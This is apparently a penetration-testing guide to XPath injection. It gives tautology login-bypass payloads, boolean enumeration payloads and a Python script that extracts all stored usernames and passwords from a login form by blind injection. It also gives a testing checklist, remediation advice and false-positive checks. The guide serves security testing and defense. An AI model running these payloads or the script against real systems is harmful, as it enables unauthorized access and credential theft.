XPath Injection
XPath injection targets applications that use XML databases or XML-backed authentication. By manipulating XPath queries, attackers can bypass authentication, extract entire XML documents, and read data they should not see. Unlike SQL databases, XPath has no concept of permissions, so a successful injection gives access to the entire XML document.
Authentication Bypass
XPath authentication queries typically follow the pattern //user[username='INPUT' and password='INPUT'].
By injecting a tautology (an always-true condition), an attacker can bypass authentication in much the same way as with SQL injection.
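A minimal sketch of why the tautology works, assuming the application builds its query by string concatenation. The function name build_login_query is hypothetical, and the sketch only assembles the query string; it does not evaluate it. Because XPath's and binds more tightly than or, the injected predicate reads as username='' or ('1'='1' and password='') or '1'='1', which is true for every user node.

```python
def build_login_query(username: str, password: str) -> str:
    """Hypothetical vulnerable pattern: user input is pasted into the XPath string."""
    return f"//user[username='{username}' and password='{password}']"


# Benign input stays inside the string literals.
print(build_login_query("alice", "s3cret"))

# The tautology payload closes the literal and adds its own boolean logic.
payload = "' or '1'='1"
print(build_login_query(payload, payload))
```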
# Inject into Username and Password fields:
' or '1'='1
' or '1'='1
# Result: //user[username='' or '1'='1' and password='' or '1'='1']
admin' or '1'='1' or '1'='1
anything
admin']
anything
' or 1=1 or ''
' or 1=1 or ''
Data Extraction
Because XPath has no permission system, an injected expression can reach any node in the XML document.
Use XPath functions such as name(), substring(), string-length(), count(), and contains() to enumerate the XML structure and extract values one boolean answer at a time.
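To illustrate how boolean answers alone are enough to recover a value, the sketch below simulates the server side with plain Python functions. No XPath engine or network is involved, and make_oracle, recover, and the sample value are all hypothetical names chosen for this example. It first learns the length (mirroring string-length()) and then tests one character position at a time (mirroring substring()).

```python
import string

CHARSET = string.ascii_letters + string.digits + "@._-"


def make_oracle(secret: str):
    """Simulate the server's true/false answer for two XPath-style probes."""
    def length_equals(n: int) -> bool:
        # Mirrors: string-length(<expr>) = n
        return len(secret) == n

    def char_equals(pos: int, char: str) -> bool:
        # Mirrors: substring(<expr>, pos, 1) = 'char' (XPath positions start at 1)
        return secret[pos - 1:pos] == char

    return length_equals, char_equals


def recover(length_equals, char_equals, max_len: int = 50) -> str:
    # Learn the length first, so the character loop knows where to stop.
    length = next((n for n in range(max_len + 1) if length_equals(n)), None)
    if length is None:
        raise ValueError("value longer than max_len")
    recovered = ""
    for pos in range(1, length + 1):
        # Try each candidate; '?' marks a character outside CHARSET.
        recovered += next((c for c in CHARSET if char_equals(pos, c)), "?")
    return recovered


length_equals, char_equals = make_oracle("admin42")
print(recover(length_equals, char_equals))
```

Knowing the length up front distinguishes "end of string" from "character not in the candidate set", which a loop that simply stops at the first miss cannot do.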
# Discover XML structure (node names):
' or name(.)='a' or 'a'='b
' or name(parent::*)='users' or 'a'='b
# Character-by-character string extraction:
' or substring(//user[1]/username,1,1)='a' or 'a'='b
' or substring(//user[1]/username,1,1)='b' or 'a'='b
# Count nodes:
' or count(//user)>0 or 'a'='b
' or count(//user)>5 or 'a'='b
' or count(//user)=10 or 'a'='b
# String length:
' or string-length(//user[1]/password)>5 or 'a'='b
' or string-length(//user[1]/password)=8 or 'a'='b
# Content search:
' or contains(//user[1]/password,'admin') or 'a'='b
Blind XPath Injection
import requests
import string

url = "https://target.com/login"
charset = string.ascii_letters + string.digits + "@._-"

def xpath_blind(query):
    # Wrap the boolean test so the predicate is true only when `query` is true
    payload = f"' or {query} or 'a'='b"
    resp = requests.post(url, data={
        'username': payload,
        'password': 'x'
    }, timeout=10)
    return 'Welcome' in resp.text  # True condition indicator

# Count users:
user_count = 0
for i in range(1, 50):
    if xpath_blind(f'count(//user)={i}'):
        user_count = i
        print(f'[+] Found {i} users')
        break

# Extract a string character by character:
def extract_string(xpath_expr, max_len=50):
    result = ''
    for pos in range(1, max_len + 1):
        found = False
        for char in charset:
            if xpath_blind(f"substring({xpath_expr},{pos},1)='{char}'"):
                result += char
                print(f'[+] {xpath_expr}: {result}')
                found = True
                break
        if not found:
            break  # end of string, or a character outside charset
    return result

# Extract all usernames and passwords, using the count found above:
for i in range(1, user_count + 1):
    username = extract_string(f'//user[{i}]/username')
    password = extract_string(f'//user[{i}]/password')
    print(f'User {i}: {username}:{password}')
Testing Checklist
- 1. Identify potential XPath entry points (login forms, search, XML-backed APIs)
- 2. Test for errors by entering a single quote (') in input fields
- 3. Test authentication bypass with classic XPath tautologies
- 4. Test blind extraction using substring() and boolean conditions
- 5. Enumerate XML structure with name() and count()
- 6. Test for XPath 2.0 functions if available
Evidence Collection
Injection Proof: Request/response showing authentication bypass or data extraction
Data Extracted: Usernames and XML structure; redact passwords in the report
CVSS Range: Auth bypass: 8.1–9.8 | Data extraction: 7.5–8.6
Remediation
- Parameterized XPath: Use parameterized/precompiled XPath queries instead of string concatenation.
- Input validation: Reject or escape special characters: ' " [ ] / @ = *
- Migrate to database: Consider migrating from XML data stores to a proper database with access controls.
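The first two remediation points can be sketched with the Python standard library alone. This is one possible approach under stated assumptions, not a definitive implementation: the sample document, the allowlist pattern, and the function names are hypothetical. Since the standard library's ElementTree has no variable binding, the sketch avoids building an XPath string from input at all and compares values as data. Where the XPath library does support variables (lxml, for example, accepts them as keyword arguments to xpath()), binding the input as a variable is the more direct form of parameterization.

```python
import hmac
import re
import xml.etree.ElementTree as ET

# Illustrative document; a real store would be loaded from disk and hold password hashes.
USERS_XML = """
<users>
  <user><username>alice</username><password>s3cret</password></user>
  <user><username>bob</username><password>hunter2</password></user>
</users>
"""

# Allowlist: letters, digits, and a few punctuation characters; no quotes or brackets.
USERNAME_RE = re.compile(r"[A-Za-z0-9@._-]{1,64}")


def is_valid_username(value: str) -> bool:
    return USERNAME_RE.fullmatch(value) is not None


def authenticate(root: ET.Element, username: str, password: str) -> bool:
    if not is_valid_username(username):
        return False
    for user in root.iter("user"):
        # Values are compared as data in Python; no XPath string is built from input.
        if user.findtext("username") == username:
            stored = user.findtext("password") or ""
            return hmac.compare_digest(stored.encode(), password.encode())
    return False


root = ET.fromstring(USERS_XML)
print(authenticate(root, "alice", "s3cret"))
print(authenticate(root, "' or '1'='1", "' or '1'='1"))
```

An allowlist is used rather than a blocklist of special characters because it fails closed: anything not explicitly permitted is rejected, including characters the blocklist author did not think of.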
False Positive Identification
- XML parsing error ≠ injection: An XML/XPath error in the response indicates input reaches the query, but confirm you can extract data or bypass logic before classifying as exploitable injection.
- Limited data in XML store: XPath injection in a config file with no sensitive data may be low impact — assess what data the XML document contains.
- Modern framework protection: Many frameworks parameterize XPath queries. Verify that the injection actually modifies the query structure rather than passing through as literal text.
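One way to check whether input changes the query structure is a differential test: send an always-true condition, an always-false condition, and a plain non-matching value, then compare the responses. The sketch below assumes a hypothetical send callable that submits one input value and returns the response body, and it assumes responses are otherwise static; pages with timestamps or tokens would need a looser comparison.

```python
from typing import Callable


def looks_boolean_injectable(send: Callable[[str], str]) -> bool:
    """Compare responses to true, false, and literal inputs.

    `send` is a hypothetical callable: it submits one value and returns the body.
    """
    true_body = send("' or '1'='1' or 'a'='b")
    false_body = send("' or '1'='2' or 'a'='b")
    literal_body = send("value-that-matches-nothing")  # baseline: plain non-matching input
    # If input is handled as literal text, all three responses should be identical.
    # A structural change shows up as the true case differing from the other two.
    return true_body != false_body and false_body == literal_body


# Stand-ins for two kinds of target, used only to exercise the check:
def parameterized_app(value: str) -> str:
    return "Login failed"


def vulnerable_app(value: str) -> str:
    return "Welcome" if "'1'='1'" in value else "Login failed"


print(looks_boolean_injectable(parameterized_app))
print(looks_boolean_injectable(vulnerable_app))
```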